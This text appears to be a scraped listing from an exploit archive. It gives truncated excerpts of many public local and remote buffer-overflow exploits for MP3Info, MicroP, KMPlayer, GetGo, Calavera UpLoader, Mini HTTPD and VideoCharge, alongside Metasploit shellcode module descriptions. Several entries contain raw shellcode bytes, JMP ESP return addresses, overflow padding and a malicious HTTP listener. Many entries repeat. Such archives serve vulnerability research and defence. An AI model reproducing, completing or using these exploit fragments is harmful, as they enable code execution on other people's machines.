MP3Info 0.8.5a - SEH Buffer Overflow Exploit

Exploit for windows platform in category local exploits $shellcode = "\xdb\xd4\xba\x2b\xc5\x7d\xb7\xd9\x74\x24\xf4\x58\x29\xc9" . "\xb1\x32\x31\x50\x17\x83\xe8\xfc\x03\x7b\xd6\x9f\x42\x87" . "\x30\xd6\xad\x77\xc1\x89\x24\x92\xf0\x9b\x53\xd7\xa1\x2b"...

MicroP 0.1.1.1600 - '.mppl' Local Stack Buffer Overflow

!/usr/bin/env ruby Exploit Title:MicroP.mppl Local Stack Based Buffer Overflow Author:Necmettin COSKUN = twitter.com/babayarisi Blog : http://www.ncoskun.com http://www.grisapka.org Vendor :http://sourceforge.net/projects/microp/ Software...

MicroP 0.1.1.1600 - .mppl Local Stack Buffer Overflow

MicroP 0.1.1.1600 - .mppl Local Stack Buffer Overflow !/usr/bin/env ruby Exploit Title:MicroP.mppl Local Stack Based Buffer Overflow Author:Necmettin COSKUN = twitter.com/babayarisi Blog : http://www.ncoskun.com http://www.grisapka.org Vendor :http://sourceforge.net/projects/microp/ Software...

Firefox Exec Shellcode From Privileged Javascript Shell

This Metasploit module allows execution of native payloads from a privileged Firefox Javascript shell. It puts the specified payload into memory, adds the necessary protection flags, and calls it. Useful for upgrading a Firefox javascript shell to a Meterpreter session without touching the disk...

MicroP 0.1.1.1600 Buffer Overflow

!/usr/bin/env ruby Exploit Title:MicroP.mppl Local Stack Based Buffer Overflow Author:Necmettin COSKUN = twitter.com/babayarisi Blog : http://www.ncoskun.com http://www.grisapka.org Vendor :http://sourceforge.net/projects/microp/ Software...

Firefox Exec Shellcode From Privileged Javascript Shell

This module requires Metasploit: http//metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' require 'msf/core/payload/firefox' class Metasploit3 'Firefox Exec Shellcode from Privileged Javascript Shell', 'Description' = %q Allows execution of...

KMPlayer 3.8.0.117 - Buffer Overflow Exploit

Exploit for windows platform in category local exploits import struct def littleendianaddress: return struct.pack"L",address junk = "\x41" 250 eip = littleendian0x7C86467B 7C86467B FFE4 JMP ESP kernel32.dll shellcode= "\x31\xC9" // xor ecx,ecx "\x51" // push ecx "\x68\x63\x61\x6C\x63" // push...

GetGo Download Manager 4.9.0.1982 Buffer Overflow

!/usr/bin/python Exploit Title: GetGo Download Manager HTTP Response Header Buffer Overflow Remote Code Execution Version: v4.9.0.1982 CVE: CVE-2014-2206 Date: 2014-03-09 Author: Julien Ahrens @MrTuxracer Homepage: http://www.rcesecurity.com Software Link: http://www.getgosoft.com Tested on: WinX...

KMPlayer 3.8.0.117 Buffer Overflow

Exploit for windows platform in category local exploits !/usr/bin/python KMPlayer 3.8.0.117 Buffer Overflow Author: metacom Tested on: Windows Xp pro-sp3 En Download link :http://www.chip.de/downloads/KMPlayer33859258.html Version: 3.8.0.117 Kmp Plus Howto / Notes: Run KMPlayer Playlist Editor Ne...

Calavera UpLoader 3.5 - SEH Buffer Overflow Exploit

Exploit for windows platform in category local exploits rell = "\x41" 477 rell1 = "\x42" 4000 head = "\x41" 8 head += "\x0d\x0a\x31\x0d\x0a" head1 = "\x0d\x0a" head2 = "170.1.1.0" head2 +="\x0d\x0a" head2 +="\x22" head2 += "C:\Archivos2de2programa\Uploader!\Uploader!23151EXE" head2 +="\x22"...

Calavera Uploader 3.5 Buffer Overflow

exploit por Daniel - La Calavera Email: [email protected] Para CracksLatinoS relleno rell = "\x41" 477 rell1 = "\x42" 4000 head = "\x41" 8 head += "\x0d\x0a\x31\x0d\x0a" head1 = "\x0d\x0a" head2 = "170.1.1.0" head2 +="\x0d\x0a" head2 +="\x22" head2 +=...

Calavera UpLoader 3.5 - Local Buffer Overflow (SEH)

exploit por Daniel - La Calavera Email: [email protected] Para CracksLatinoS relleno rell = "\x41" 477 rell1 = "\x42" 4000 head = "\x41" 8 head += "\x0d\x0a\x31\x0d\x0a" head1 = "\x0d\x0a" head2 = "170.1.1.0" head2 +="\x0d\x0a" head2 +="\x22" head2 +=...

Linux Reboot

A very small shellcode for rebooting the system. This payload is sometimes helpful for testing purposes. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = 32 include...

CVE2014-0 3 2 2 0Day Exploit analysis-exploit warning-the black bar safety net

Recently there was an IE 0day CVE-2 0 1 4-0 3 2 2is used to hang horse。 Although the vulnerability itself exists in IE,but in order to achieve success use,this sample also borrow a flash as an auxiliary,to break through the various protection. IE+flash combination also gives the analysis poses so...

Notepad++ CCompletion Plugin 1.19 - Local Stack Buffer Overflow

Application:Notepad++ Version:6.5.2 UNICODE Get the application from: http://notepad-plus-plus.org/download/v6.5.2.html Plugin:CCompletion Version: Version 1.19 Unicode Get the plugin from: http://sourceforge.net/apps/mediawiki/notepad-plus/index.php?title=PluginCentral Vulnerability:Stack buffer...

Notepad++ CCompletion Plugin 1.19 - Local Stack Buffer Overflow

Notepad++ CCompletion Plugin 1.19 - Local Stack Buffer Overflow Application:Notepad++ Version:6.5.2 UNICODE Get the application from: http://notepad-plus-plus.org/download/v6.5.2.html Plugin:CCompletion Version: Version 1.19 Unicode Get the plugin from:...

Python - socket.recvfrom_into() Remote Buffer Overflow

Python - socket.recvfrominto Remote Buffer Overflow !/usr/bin/env python ''' Exploit Title: python socket.recvfrominto remote buffer overflow Date: 21/02/2014 Exploit Author: @sha0coder Vendor Homepage: python.org Version: python2.7 and python3 Tested on: linux 32bit + python2.7 CVE : CVE-2014-19...

Python socket.recvfrom_into() remote buffer overflow exploit

Proof of concept, that demonstrated the remote exploitability of this python socket flaw, if the python code uses recvfrominto unsafelly. To avoid NX, ret2libc can be used thanx to !/usr/bin/env python ''' Exploit Title: python socket.recvfrominto remote buffer overflow Date: 21/02/2014 Exploit...

Mini HTTPD 1.21 - Stack Buffer Overflow POST Exploit

Mini HTTPd version 1.21 stack buffer overflow POST exploit for Windows XP SP3. !/usr/bin/python Title: Mini HTTPD stack buffer overflow POST exploit Author: TheColonial Date: 20 Feb 2013 Software Link: http://www.vector.co.jp/soft/winnt/net/se275154.html Vendor Homepage: http://www.picolix.jp/...

VideoCharge Studio 2.12.3.685 GetHttpResponse() - MITM Remote Code Execution Exploit

Exploit for windows platform in category remote exploits from socket import from struct import pack from time import sleep host = "192.168.0.1" port = 80 s = socketAFINET, SOCKSTREAM s.bindhost, port s.listen1 print "\n+ Listening on %d ..." % port cl, addr = s.accept print "+ Connection accepted...